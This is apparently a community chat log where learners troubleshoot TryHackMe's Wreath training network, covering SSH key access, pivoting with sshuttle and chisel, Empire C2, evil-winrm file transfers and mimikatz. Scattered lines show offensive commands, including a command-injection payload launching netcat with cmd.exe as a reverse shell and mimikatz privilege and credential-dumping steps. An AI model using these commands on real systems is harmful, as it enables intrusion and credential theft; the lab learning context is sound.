Network went go sleeping 😄

@static elk

@polar holly

wut

help

idk

oki

maybe id_Rsa not fuond

thats the warning

wait, ig, I need to go to the .ssh dir

smh, I need to get the id_rsa file from the webserver

why is it not working

can someone help me out?

I am trying to get it to my local machine.

let me think....

If id_rsa file is in .ssh folder then

I'm hosting the simple http server from the .ssh folder

Didn't get your problem

.

I copied the contents from the id_rsa to my own box, now this still doesn't work smh

I don't think, you should use ports lower than 15000 as stated in the room. Possibly, your web server didn't start properly😅

That is just to get the rsa file

I’ve stopped it

So no worries.

Someone might have modified /root/.ssh/authorized_keys on the target machine.
Some people don't learn

I need to re modify it then?

You may append your public key at the end of it

Alright, thanks

Gave +1 Rep to @lusty saffron

I’ll work on it when I get back home.

@lusty saffron

aaaand still the same.

@elder kite

@merry robin Somebody fucked with the wreath network, they made the authorized_keys file immutable and they removed chattr from the machine. @elder kite was trying to help me in VC and he came to a conclusion about the same. This may or may not be an accident(Note: this was not me, I was just trying to get through the network.)

It's possible they just mangled the pub key, and the priv key

Don't know what happened exactly but the network is broken for now.

Pretty sure I was the one who made the authorized_keys file immutable, and removed chattr from the machine

People kept using them to screw with the initial access 🤷‍♂️

That's why it tells you to download the private key and use that

So, I can’t just copy and paste it in?

Which task, I actually forgot 😅

Task 20 Git Server Exploitation => can't ping my attacker machine

I think, it is the intended behaviour
Does the room say that you can do so?

Just a bunch of idiots, if you want to have fun, just make a binary king.txt file, just to kick out the too much curious people who will cat that 😄

Not in a network I hope 👀
Trolling ain't appreciated in a shared learning environment.

What I mean, if you want to do fancy joke, keep it small without breaking. And a joke like this, somethings suspect, you will first check the file type instead of running whatever random command

But deleted or changing system config, to block people to go back in, that's a NOGO

Or you could leave my poor network alone and just work through it without changing anything about the experience for anyone else.

If I had wanted fancy jokes in it, I would have added them myself.

Only wanted to point out that that jokes like this, locking out people of this learning path is a not done. That's all

has the evil-winrm download issue been fixed?

wasnt able to download the .website git dir

Im gonna go ahead and guess no, then..

I got stuck on that same issue like two weeks ago

zzz

It worked here, yesterday or so

maybe rollback to older evil-winrm version

oh

I ll give it a shot then

What is the problem exactly? I'm busy with the network and can scroll up in my notes

Exactly to a T what you said

was my issue also

download completes = nothing gets actually downloaded

I ll comeback to finish the network tommorow assuming that part was fixed

We have to provide the full path, not like in the task or in the video

ah good to know

I think I tried that and it still failed though

weirdchamp

mind giving me the command u used? if u still have it

I used this: download C:\GitStack\repositories\Website.git Website.git

thanks chief

and in the Website.git directory, you still have that messy full path 😄

Take a break when you started the command 😄

So slow ... 😛

good to know, thank you @surreal sail

Gave +1 Rep to @hushed lark

@merry robin There's some little thing confusing in task 43. As we use twice the port number 443 for the reverse shell. Once as Thomas user, and later on for the privilege escalation

But i'm in 😄 whoami
nt authority\system

@merry robin Dude!? Did you set this all up? Because this is awesome! Tell me where I should send a six pack of sweet brown beer of Belgium. 😄

Just finished!!!

But need to redo this all, some part where kind hard to get and understand

See you laters, gonna sleep a day or two now 😄

Damn, I was just about to post the same problem. Glad I searched first.

Anyone know when this might be fixed? I finished a couple learning paths already and was doing CTF machines until I realized they weren't real-world.

Vote for a reset. If the machine is broken people will vote quickly.

@merry robin can you tell me which task is this?

@merry robin I'm not getting any agreements to reset lol

Watching dark's walkthrough on wreath(Git server Pivoting), it works fine for him, what's the problem when I'm doing it

connected?

it shows ur connected right

Ok, I'm still not able to SSH in with the id_rsa key after the reset.

@hollow bane Are you able to SSH in with the id_rsa key (no pivoting)? I saw that you had the same problem as me earlier.

I'm still not able to ssh into it

that's dark's walkthrough smh

wdym

u didnt share ur error

how would i know lol

...

@polar holly

Did you copy-paste the private key?
There must be some extra whitespace in the file, in beginning or at end.
Remove those and the key should work

Hey hey hey😄
You weren't supposed to perform that modification on your system.
It was meant for the target - prod-serv

I just looked at the terminal title, if you did it right. Then ignore above message🙂

that is the prod server

it's just on tmux

Did you get past it?

What about /etc/ssh/sshd_config?
Add your own auth_key path into it.
And save your public key on the system with the given naming format in the room

And restart sshd😄

@lusty saffron No white spaces in my file

Then there is something wrong with your key. Usually it is because of copy-pasting from one terminal to other with extra lines🙂

nope still gotta do it mate, just about to go into the examination hall

can you assist me in VC later if you are free?

@lusty saffron Thanks for your help! It must have been something, but I'm not sure what. Originally I copy and pasted into Sublime, but I just tried with Nano and it worked 🙂

Gave +1 Rep to @lusty saffron

Left is the id_rsa I did in Sublime and the right is what I did in Nano.

All the other machines I've copy and pasted the id_rsa file I did in Sublime, so not sure what the deal was this time. Oh well, I can finally move forward! Thanks again.

Well, I have got some evaluations going on.
I will let you know when I get a chance to hack with you😁

Thank you

Gave +1 Rep to @lusty saffron

anywho, I'm going to head into my examination hall now, I'll cya'll later

Good luck

Good luck @hollow bane

I'm done with the exam now 😄

Hey people I am trying to connect to wreath web server but get this error

Also 10.10.10.10, gives me this page, like I am connected but no IP address

That is because your browser is trying to redirect through a proxy which is switched off

Usually happens when you're trying to use the Burp proxy without starting Burp Suite

Wreath is on a different subnet -- frankly I'm surprised you can connect to 10.10.10.10 at all

Using SSH local port forward, I am able to connect with xfreerdp.
Using this same technique with WinRM, I cannot connect with evil-winrm, despite adding my user to RMU & having logged in before.
Commands:
ssh -L 3336:10.200.198.150:5985 root@10.200.198.200 -i id_rsa -fN
evil-winrm -u breadslice -p xxxx -i 127.0.0.1 -p 3336

Port 5985 on 10.200.198.150 still shows as open.

Do you have a forwarding rule or something between 3336 and 5985?

Oh yep, didn't see that

I'm thinking the problem is some odd WinRM behaviour? As it works, as expected, with RDP (on a different port, of course).

Have you tried using same port on both ends?

Some protos are weird

I'll have a go at that, thanks!

Good day all, I would like to ask what does the message "Garbled Time" means in ssh?

I've already copied the key to my attack machine and checked there's no extra space

Didn't make a difference.

No idea then

this is when I tried to use ssh to connect to the public-facing server (the first compromised machine)

Thanks for taking the time.
I also voted for a reset of the box, as perhaps someone messed up its configuration.

Gave +1 Rep to @strange bison

Alright, I found the issue.
It is -P (capital) and not -p to specify a port.

I am using C2 Empire from Docker (install on Ubuntu 18.04 is tricky).
When setting up a listener; I am assuming we want the Host to be our localhost (as seen by THM on this specific subnet)?
This does not work, and using the IP of the Docker container is not working either.
I am having issues troubleshooting this, as I don't fully understand yet what we are trying to achieve.

Any pointers?

Solved it with port forwarding.
I need a rubber duck ..

Anyone else have had issues with root password hash ?

i've copy pasted it and its says its not correct still

What exactly do you mean by "not correct?"

Is it just not getting recognized as a hash by whichever tool your using?

Answer is not correct

Oh

in explotation phase in the first machine there is question about root password

That I can't really help with as I haven't done this network yet lol

lol

On my VM had the wreath hack up to the reverse shell. But VM crashed and had to restart. Would I need to redo the hack from scratch or can I just continue to the git section and beyond. Also am slightly stuck with the chisel and sshuttle pivoting sections.

I don't see any listeners in the list.

nothing in the web interface too

My laptop is the only device out of 7 device to get the lowest Wi-Fi speed.
I get full speed in my phone as well as in other 6 devices but the speed is only slow in my laptop.

I'm using Windows 10 and had my Drive C format and things got better for some minutes and suddenly, the issue came out again.

What could be the reason?

Hey!

This chat is specifically dedicated to the Wreath network hosted on tryhackme.com 🙂

My bad! 😂

Will I have to redo steps 5-7 or can I start again from step 17? (Git Server)

Anyone?

Are you sure listener is executed?

Maybe something is blocking.....🔥

Maybe, I’ll do it tomorrow, it’s late and I haven’t gotten any sleep from the past 2 days

any idea on how to fix this?

Starting the Git Server section but not sure if I can run the task from a fresh tab or would I need the reverse shell from step 5. Can anyone advise please?

anyone?

here is the output when I try to execute the listener DarkW ^

Gotta troubleshoot why its not starting.

nvm

So no one knows the answer to my problem?

Is it just me or i can't access the wreath network anymore ?

I've been on it all day basically

I'll be up to that soon. Will lyk when I get there

Thank you

no i don't think you'd , besides you should have gotten a way more stable shell than the rev shell

I'm having issues exploiting git-server can't figure how to create the relay via .2xx

Lol. I'm almost there. I'm running the Nmap scan now. Will help you guys soon

alright LG

What happened was the VM crashed, and rebooted it, but the shell was lost, so was wondering if I had to re-run the shell or proceed to do step 17 regardless.

you can proceed regardless

Will get on it after. Thanks everyone for your help 😎

Ur stuck on pivoting or something later?

Ah ok. I see where you're stuck. I just got up to there right before I had ti run out to class. If you still need help later, I'll help you out. Dosent seem like it'll be too hard

Definitely isn't that difficult. figured it out, would continue it later.

ok cool. imma prolly finish up this network tonight

this one is wayyyyy easier than holo lol

Dude. I fucking love these networks. Between this one and holo I've learned so much

Did you ever figure this out? If not I can help you out now. Just finished the empire bit

Yeah it’s working idk how but it is

Toaster is helme out, but thanks for the offer.

Ah ok. Well, if you need an explanation on why it works, I can do that too. I kinda did a deep dive on empire once I got to it. Which is why it took me so long lol

got it

Anyone know what im doing wrong here?

Try providing the full path

i did, but then i was sitting there for like 10 minutes. I figured that wasnt right cuz it said it should only take 1 or 2 minutes

but ill go do that now. thanks

prod-serv is unreachable

I was just on the network earlier. Everything 2as working fine for me

hey just started wreath today, cant get to the portal (https://thomaswreath.thm/) "The connection has timed out"

Read the rest of that task. It will tell you exactly what you need to do

hostname is added

Are you connected to the wreath vpn?

yup

Network state: Running

Can we please get enough reset request to reset the network to make sure

Just double checking, you're using the wreath specific vpn? It's not the same ovpn file you would use for normal boxes

Because there's no other reason you should be having issues

I was on the network like 2 hours ago

And it was fine

yup.. I double checked the VPN and I am on wreath specific vpn... spinning up vanilla kali box to see if that has any different results

Interesting

Can you send a screenshot of your /etc/hosts?

sure

weird cant paste ss here... need to do it from my phone i guess

this is what I have in my hosts files: 10.200.101.200 thomaswreath.thm

Weird. It should work

47000?

still haven't gotten a shell

Not working even from the GUI

Which machine are you trying to get a shell on?

The webserver or the gitServer?

Is anyone else have issues to answer on question regarding root password hash ?

Which task? I don't remember each question by heart lol

Oh wait

You're talking about the webserver

Right?

Git server

Which listener are you using?

http_hop

You set up the jump server correctly?

Yeah

Remember, it has to be a php server

Hiw do I start the PHO server, with the command in the task right

I even grepped it with port 47000 open

It works

Did you open the firewall?

But, can’t get back the connection

Ig not

How do I do that?

One of the tasks leading up to the one your on shows you how to open the firewall and key a specific port through. I don't remember the exact command and don't have my notes on me right now, but its there somewhere

Going to bed in a few minutes, can you check and tell me, if you can’t thiugh, that’s alright, I’ll just work on it tomorrow

firewall-cmd --zone=public --add-port PORT/tcp

It's in task 20

But thats the command

Once you open the firewall you should get your connection

Yeah that

Got it, thanks

Np

If you have any other issues let me know

Anyone else having issues connecting to the network? I can't even ping the webserver

vpn is connected

and network is running

It just refuses to let me connect

anyone else unable to load https://thomaswreath.thm? It just times out. Checked my hosts file, server pings ok, just never loads the page and never gives the unsecure-->proceed? option listed in Task 5 - Q5

idk. id try to help but as seen above, i cant even ping the webserver

ip is 10.200.193.200 for me

maybe ur 3rd octet (185) is wrong?

nah. the 3rd octet is random for evryone

mkay

why does it require 8 votes to reset?

this seems excessive

@hushed cargo do you know of any similar rooms to practice pivoting?

Lol. You can vote once every hour

I'll be able to reset it in about 10 minutes

Nope. But this one goes really in depth on it

Best way to practice would be try out all the different things it talks about

yeah, I might just spin up a vm lab, studying for eCPPTv2

thanks

Because there are a good few people per network and it is extremely annoying having the thing pulled out from under you

8 is about 20% of users in each subnet, iirc

Possibly 25%

Unfortunately, that's also why things break though. Some people are gits who like spoiling it for others

@merry robin copy thanks, any ideas how to load the thomaswreath.thm page give the circumstances?

Gave +1 Rep to @merry robin

If the server pings, then possibly. Disconnect from the VPN and DM me your ovpn file please?

I just reset the network and still cant ping the webserver. Any ideas?

Give it time to restart, and/or try to regenerate your VPN pack. That and make sure you're using the right VPN

And connecting to the right IP

yea. ok. will regen my vpn pack now

Give it about 2 minutes and then ping the machine

i reset it 15 minutes ago

After a full reset there's nothing that can be wrong at the network side -- it's literally resetting back to the base images, which I know work

ok

Wow, vpn pack regen should work

Meaning either a VPN thing, or an AWS thing

yea, regenning the pack worked

Noice

Wonderful :)

Right. Bed time

lol. Good night

Have a good night’s rest Muiri.

Was a blast, i learned a ton. Genuinly haven't had this much fun in a while. I'm super excited to attempt to finish holo again now. Sidenote, im just now realizing my username contains my real name, is there a way to change this?

Hi guys, does anyone know why i cannot download the wreath vpn? It says: you don'w have access to any networks

Have you met the requirements for this room?
A 7 day streak or being a subscriber🙂

If so, try leaving and re-joining the room

oh, I didn't know i could leave rooms

thanks

copy thanks @lusty saffron

Gave +1 Rep to @lusty saffron

You can change your username by emailing support
I don't know if it would update the badges though

Yea. Someone told me that. I sent an email, thanks. And yea, old badges are whatever, but obviously I want it changed going forward

Thanks for the tip tho

Did anyone else come across an issue with installing powershell-empire? I keep getting a 404 error

anyone know hot to fix this?

can you do a ls -la in that dir???

you need to rename the website.git folder to .git

still cant get to the internal website lol

if you need help feel free to send me a dm

Figured it out

Thanks for the help though

No problem

the file has been executed

still haven't got a reverse shell.

I've tried with multiple different ports

@merry robin can you help?

sorry for the ping

did you try pinging yourself?

and capturing icmp traffic

yeah

or wait, gimme a sec

wait

it says request timed out

tried to reconnect with the chisel server, still no response

oh .. nvm me.. you defo have RCE

firewall is probably messing with you

let me check my notes

taking a look at it 1 sec @hollow bane

alright, thanks omega

should I just open up a port in the firewall?

so this is the cross compiled netcat, right?

I didn't cross-compile netcat.

just used the nc64.exe

I'll just try and cross-compile nc

before you do

Mm-hmm

do me a favor and try to just connect netcat to port 80 and see if that works

alright, I'm going to stop the python server and try and do that

because if you were able to download from your webserver you know at least that that port is open

(and I honestly think that box doesn't block any ports)

Alright, let me check

you can even try without the -e cmd.exe and see if it even connects

my guess is that nc.exe is getting rekt somehow ...

both of them don't work

wait

aaand, still nope

tried with 443 and 80 with and without -e cmd.exe

so either something is wrong with the URL payload or your nc.exe is getting blocked

1 sec

alright

in the screenshot, the IP of my attacking machine was wrong

the ping works, but with the fixed url, it still doesn't work

did you URL encode it?

the powershell.exe command?

here is the response from my machine

ye

nope

try that, and then maybe try running the nc.exe help thing and see if netcat is even executing

alright

URL encode doesn't work

ok, test if netcat is even running by trying to print the help (or similar)

powershell.exe nc-VainXpliots.exe --help?

or whatever the windows equivalent is.. heh

but even if that prints an error message I'm ok with it 😛

because, instead of getting it into temp, I even tried getting it into the current working directory

I mean your command looked correct (mine was: ||powershell.exe c:\\windows\\temp\\nc-OmegaVoid.exe ip-address 62626 -e cmd.exe|| )

no output at all

yours seemed to have worked

isn't it the same as what you were testing in the first place

yeah, but I don't know what the hell is wrong here

Everything is like it should be, but I still can't figure out why it isn't working.

sounds like your netcat is borked

try crosscompiling

that's the last resort now, I'll try and do that now

let me know if it works

sure thing

@barren wren I got the shell

Thanks you

🥳

so the nc64.exe from the github didn't work, right?

nope

@merry robin letting muiri know 🙂

corss-compilation worked

It's all gonna be done in a matter of an hour, thanks for the help

glad you got through it

I know it can get frustrating sometimes

Yeah, Thanks again

Gave +1 Rep to @barren wren

it's more annoying when it's in the middle of an exam 😄

happened to you?

so many things happened. You gotta power through until things workk

Agreed

go methodically testing everythign and when something isn't working figure out why and how

yeah, the only mistake I made was not trying to cross-compile it

if I would have done that, I would have been done with wreath by now

well.. task text said it should have worked

didn't work for me for some reason, maybe that a problem that was caused locally

well, muiri should know now if he reads the ping, so he can fix it 🙂

yeah

crosscompilation is a good skill to have though 🙂

I read that, I just thought I just didn't need it

but was needed

I've used it on many unintended paths 😛

😆

Wut?

check messages

nc64.exe didn't work, without cross-compiling

Maybe it's a problem that occurred locally or smth

Omega helped me out, I just had to cross-compile

If I remember correctly it was probably AV blocking NC. The tasks say that that could be a problem which is why it shows you how to cross compile

yeah

The one shipped with Kali?

Because there's a reason I told you not to use that one

nope, the one downloaded from github

maybe it's something locally

That's literally the same as the one you compile -- just precompiled for you

hmm, welp, I honestly don't know what happened

after I compiled it, it sure did work, before that, it didn't budge

Weird

exactly

That makes 0 sense

It's not different in any way

I literally don't know why, it happened

Damn

again, maybe it's something locally

Yea. Could be

this isn't the output I was supposed to get, was I

because I don't have a reverse shell

Yea. The service is supposed to time out cuz it won't actually start the service

Make sure your script is still in the right spot. Theres a cleanup script running on that machine every 5 minutes or so incase someone forgets to clean up after themselves

it worked this time

maybe, I was late in doing the second command, it mentioned that after 5 minutes, windows performs a cleanup script

Yea. Possibly.

Mm-hmm

anyone know how I can fix this?

It's saying you don't have a file called system

I clearly remember downloading it

Ls?

did that, but I don't see it

I'll try downloading it again

Well then it may have downloaded to a different directory. What did you use to download it?

samba

Hm

Sure you copied to the right dir?

yeah

I'll try and do it again

Hm

Yea, try again

well, this isn't working

any other way than this

Lol, make sure your connected to the server you set up

I am

alright, I need to head out, it's only 1 question, I'll do it later

cya

Lol. Try restarting the server when you get back

Anyone can explain what I've done wrong on task6 that my root password hash is wrong ?

wtf, how do I fix this now?

nvm

got it

https://tryhackme.com/VainXploits/badges/wreath

Muiri, amazing network. Had a pretty good experience.

Congrats

Hello I am on task 33. All worked perfectly until downloading Website.git using Evil-WinRM. It just doesn't download anything ! Any idea where it could come this isse ? I can upload but not download ! THanks

Evil-WinRM PS C:\GitStack\repositories> download Website.git
Info: Downloading Website.git to ./Website.git

Info: Download successful!

But it download nothing I wonder if the problem is ./ downloading path.

Try specifying the absolute path. Evil-WinRM is kind of weird about relative paths for some reason

thanks but I tried a lot of variations with relative paths and without.... nothing seems to work for downloading

It's been a while since I ran through the network, but I remember something like this working

C:\GitStack\Repositories> download C:\GitStack\Repositories\Website.git /home/kali/wreath/Website.git

If not, you can always try other methods of downloading to get practice with that. I believe later portions of Wreath go over using impacket's smbserver.py to move files between your machine and the personal pc

You need to supply the absolute path to the file. Starting with C:/

And then it'll take like a year to download

THanks i was placing "to" between both paths each time !! I feel so dumb now !! So with absolute paths it works

Lol. Np. Took me a bit to figure that out too

good night people. I was doing the Wreath network room but suddenly the host unreachable (Yes, I've checked my ovpn and my internet connection, and I do be in the 10days limit). Anyone know why I can't connect to it anymore?
Thanks in advance

Try regenerating your von pack

Vpn*

The same thing happened to me

Hm, yes sure, let me try

Eh, still, regenerated and retried ssh'in, connection still unreachable.

Which machine are you trying to connect to?

oh...

Network state: Stopped

Silly me

https://tenor.com/view/think-smart-gif-22411928

hi guys

im in task 21 and the rdp authentication seems to have some error

says protocol security negotiation or connection failure

evil-winrm is running and all icmp packets can pass through the relay

used ssh port forward in my case

is something wrong here?? I'm not receiving anything through the netcat listener I'm using this netcat binary; https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat

I'm not sure if it is a problem on the payload encoded it self or the netcat listener, I've been struggling in task 20 for while

For explanation why I'm using this netcat binary is that mine's in /usr/bin/nc is looking for external libraries. (not statically build)

A few things, 1 have you made sure that the machine your targeting can actually talk back to you?

2, have you opened the firewall?

Cuz those 2 things are very important

Hey @hushed cargo, Yes I've opened firewall, about the 1 question, may you explain futher?

Read through the questions again. It walks you though how to check if the machine you're trying to attack can actually communicate with your attacking machine. Remember, you were told in the intro that the only external facing machine on the network is the first webserver. Which means everything else is an internal network

I do think my attack communicates with the target, I've connected them using sshuttle

if that's what you mean

Did you do all the steps listed in the question on task 20? Specifically the one about using tcp dump?

If not, go do it. It'll answer your question

Let me list what I've done; Download and modify 43777.py script (shebang line, changing the ip, .php name), Run the script and get the .php uploaded. After I tested with curl and it seemed to work fine, tested with few commands. On the 10.200.196.200 shell I've opened firewall on port 12346 (firewall-cmd --zone=public --add-port 12346/tcp), and through curl I got a nc binary, there I started a listener (on 12346). I do have an initial access point into the rest of the network, like recommended on the pivoting quest (sshuttle -r root@10.200.196.200 --ssh-cmd "ssh -i id_rsa" 10.200.196.0/24 -x 10.200.196.200). The only phase I'm struggling with is the burp suite / curl part. I can't get reverse shell working.

If you need more in depth explanation dm me

OK

Wait, I think I forgot a detail

Port must be higher than 15000

I had same issue

but I made mistake in reverse shell IP address command

try to re-check those as well

I've put the compromised host ip there tho

Somehow now it worked

-_-

Super

Btw on task 6 did you had correct root passwords hash ?

I'm copying from shadow file but it says that its wrong one

Yep

I just removed root:

and keep the rest as it is

Hmm for me it's completely wrong

I know for sure which one is password hash and where to find it

but its not correct 😦

Question, is there any way to avoid the reset of a box? Some folks appear to not get any further and keep spamming the reset button… kinda fun while you do have progress… any way to reset the reset requests?

You don't need to. You can continue from where your up to after the reset

Yeah only kind a lazy to do the steps after certain footholds I.e open up ports again etc.

But almost through so hopefully I’ll be done within time before it gets a reset.

Lol. I hear that

Good luck

Likely means someone changed the password. Probably means the network needs a reset and someone needs to be complained at.

ok

Hi guys!

I was poking around with mimikatz

there is something wrong while elevating to debug privilege

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

Googled a bit and all articles pointed out I don't have enough privilege to elevate to that level

but I am nt-authority and fyi, I couldn't make use of the GUI rdp session so trying to stick with evil-winrm

i dont know what's going on anymore

hey, Doing wreath. i'm at Task 17.
trying to transfer nmap to the remote and it keeps timing out
curl 10.50.159.195:80/nmap-tabris -o /tmp/nmap-tabris && chmod +x /tmp/nmap-tabris
is the command i'm using on the remote and i have a
sudo python3 -m http.server 80
running on my Kali VM (yes, it's in the correct directory)

What does a whoami /priv show?

`PRIVILEGES INFORMATION

Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled`

privilege::debug is where the error happens

That's a lot of missing privs

Maybe token::elevate if I remember correctly?

i did that too

as mentioned in the github issues

https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#offline

another issue is Invoke-Binary mimikatz.exe says filename error

executing with ./mimikatz.exe executes the binary continuously so that I have to get out of winrm session to kill that process

so I have been executing mimikatz as ./mimikatz.exe "privilege::debug" "exit"

`mimikatz # token::elevate
Token Id : 0
User name :
SID name : AUTORITE NT\Système

228 24215 AUTORITE NT\Système S-1-5-18 (04g,30p) Primary
-> Impersonated !

• Process Token : 623884 vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000 (14g,24p) Primary
• Thread Token : 624196 AUTORITE NT\Système S-1-5-18 (04g,30p) Impersonation (Delegation)`

also as mentioned he's got impersonated with that additional info

mine only has

mimikatz(commandline) # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM

Ok, now priv debug?

this is not mine

Oh because you don't have interactivity

that's an issue?

commands go through in order and are displayed as if I have the interactive mimikatz shell

sorry if im making no sense i've just started in this field

Here is the full flow

`Evil-WinRM PS C:\Users\needle.GIT-SERV\Documents> ./mimikatz.exe "token::elevate" "privilege::debug" "whoami /priv" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > https://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # whoami /priv
ERROR mimikatz_doLocal ; "whoami" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

        exit  -  Quit mimikatz
         cls  -  Clear screen (doesn't work with redirections, like PsExec)
      answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
      coffee  -  Please, make me a coffee!
       sleep  -  Sleep an amount of milliseconds
         log  -  Log mimikatz input/output to file
      base64  -  Switch file input/output base64
     version  -  Display some version informations
          cd  -  Change or display current directory
   localtime  -  Displays system local date and time (OJ command)
    hostname  -  Displays system local hostname

mimikatz(commandline) # exit
Bye!`

sorry whoami is supposed to be in winrm shell

got a little confused

I got the hash but not through the evil-winrm. git-serv\<user> didnt have enough privileges as you said but nt authority\system from the php exploit did. So stupid of me. But I made admin account and logged in as guided by the room article. Don't know why I didn't receive the privileges.

I think you can run commands from mimi, I don't remember the module

But I made admin account and logged in as guided by the room article. Don't know why I didn't receive the privileges. Hey, I know this one. It's an interesting thing with Windows

When you're an administrator, you have two tokens with two different levels of privs, a medium (user) and high (administrator)

oh

why didn't my token work

Basically you need to run mimi with administrator privs

So it can then grab system privs

Also not sure if Medium and High are the right levels there, but it's user level and administrator level

so i failed because i didnt run it as an administrator

from the gui session of rdp

and I cant elevate the powershell from the winrm alone

makes sense

You can, but that would be a UAC bypass which is really outside the scope of the room

oh

are these any rooms related to this?

It's interesting reading and learning, but it can get complicated fast

I am not sure if there are, but I'd like to see one in the future

thank you for your help

really appreciate it

Hello, for task 29 when trying to get a shell back to our Empire server, I executed the stager with curl using the "a" parameter but I got nothing back to the empire server? I used the payload we got from executing the stager earlier in the task

If anyone's on Wreath right now, the server needs a reset as someone changed the root hash again.

you can vote for a reset, because you can't find everyone that is on the same subnet here.

or you can just leave the room and rejoin it to join a different subnet. Note: you will not lose any progress

Vote for reset

Remember there is a huge number of instances
If you're asking for a reset, you need to specify what instance you're on. That's the third octet of the IPs in the network

Got it, thanks for confirming the process. Appreciate the support.

Also fyi it's 187 octet that needs the reset.

Forgot to say. I've finished Wreath network, never learned that much in 4 days, encourages me to play the other networks too :D

So, I'm on the webserver exploitation section of the network, and trying to run the python script from the CVE, and it says failed to connect even though an nmap scan worked

https://streamable.com/3oabev

Okay... I just ran the command a few more times and it just works...

Okay, now I'm trying to curl the nmap binary to the compromised server, and it isn't downloading anything

https://streamable.com/z19nxi

Oh. I think I know

Nope...

I also have no idea how to use sshuttle in git server: pivoting

usage: sshuttle [-l [ip:]port] [-r [user@]sshserver[:port]] <subnets...>
sshuttle: error: argument -s/--subnets: Unable to open subnet file: sh-cmd```

this is why I'm never gonna be good at pentesting

you have to use the linux server to pivot to the git server
your-attack-box->linux-box(200)->gitserver(150)
and you have to enter the ip of the jump box after -x not your own ip
the command will look like this

sshuttle -r root@10.200.188.200 --ssh-cmd "ssh -i id-rsa" 10.200.188.0/24 -x 10.200.196.200

Oh

Thank you

NP

Oh.... Uh, what

sshuttle -r root@10.200.188.200 --ssh-cmd "ssh -i sshkeys.txt" 10.200.188.0/24 -x 10.200.188.200
c : Connected to server.
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables v1.8.7 (nf_tables):  CHAIN_ADD failed (No such file or directory): chain OUTPUT
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99```

sshkeys_rsa

why is it sshkeys.txt?

does it matter?

...

It shouldn't

I don't think

Hmm

Try ‘-R’

Instead of -r

No

That won't work

Haven’t seen this error before. Do you have ufw or some manual iptables configuration set up on your Kali box to prevent outbound connections on certain ports?

It’s been a while since I did Wreath, so I don’t exactly remember where/when you had to open up ports on the target machines’ firewalls, but the way the error message reads seems to suggest your firewall is preventing you from making the proxy

Not that I know of. It's just a standard Kali install on WSL 2

Ah

Oh

WSL is really weird with networking. Can't remember if WSL2 fixed it to allow stuff like that

@stoic flicker would know.
Hydra: sshuttle in WSL2?

Never got it working

Oh.

Had to use proxychains and chisel

Seems to be some weird networking voodoo interfering with iptables

Oh, well that's slightly annoying, but at least I know the cause now

I have a Kali VM it's just more convenient to use WSL but I guess I can't

it says it here

I can read, but that doesn't mean anything to me

It does not, because iptables

I installed powershell-empire, on starting a client its giving me a urllub3 error

Although urllib3 is installed already

git clone --depth=1 -b dev https://github.com/EmpireProject/Empire.git /opt/Empire && \
cd /opt/Empire/setup/ && \
pip install urllib3==1.22 && \
./install.sh && \
# installer grabs some more stuff from repo - clean it up!
apt-get autoremove -y && \
apt-get clean && \
rm -rf /var/lib/apt/lists/*

try if this works.

no u

Mods

@stoic flicker

this guy is spamming shit everywhere.

For task 33, when I connect with Evil-WinRM and with the powershell-empire scripts, I can't run Invoke-Portscan.ps1? The file is uploaded and I tried using "powershell -ep bypass" then . .\Invoke-Portscan.ps1. Also, the error is saying it is not recognized as the name of a cmdlet, function, script file etc

try .\Invoke-Portscan.ps1

if it lists a help menu, you're golden, if not, you'll need to find another way to upload it onto the machine.

So i was able to upload it using "upload remote_path local_path" within evil-winrm and ".\Invoke-Portscan.ps1" didnt give me an error but I cant get the help menu

hmm

.\Invoke-Portscan.psa1 help?

try and replace the h with a H in the help part of the command

Got it, I tried again with ". .\Invoke-Portscan.ps1" and I am able to run commands

Thank you for the help

glad it worked

When using chisel to forward the webserver, am i supposed to upload chisel through this evil-winrm session or from the other shell we get from using curl? This is for task 34

through evil-winrm and make sure to mention the full path to the file i was having issues will downloading through evil-winrm for that

Ok ty, I am having that issue right now haha

no problem

I for sure have the correct path but I keep getting the error of "Check filenames or paths". Any ideas?

Try spawning a session of evil-WinRM from the folder of the file

And make sure to be the administrator with the admin hash.

I did both and nothing, the only thing is that evil-winrm is located in my opt directory but when I run sudo /opt/evil-winrm etc... , its the location of chisel. I will try again tomorrow probably but thank you for responding

Gave +1 Rep to @hollow bane

no problem

did you try upload

Can you share the screenshots?

hello im a subscriber but I do not know why i don't have access to wreath network

You need to join the room first :)

I’m not at my computer atm but from my notes, I remember writing down “upload path/to/chisel C:\windows\temp\chisel”

try and upload it to your current path instead of temp.

That's what I did, and if you don't mind ||you have to remove the files later in the room, so it doesn't matter where you upload them.||

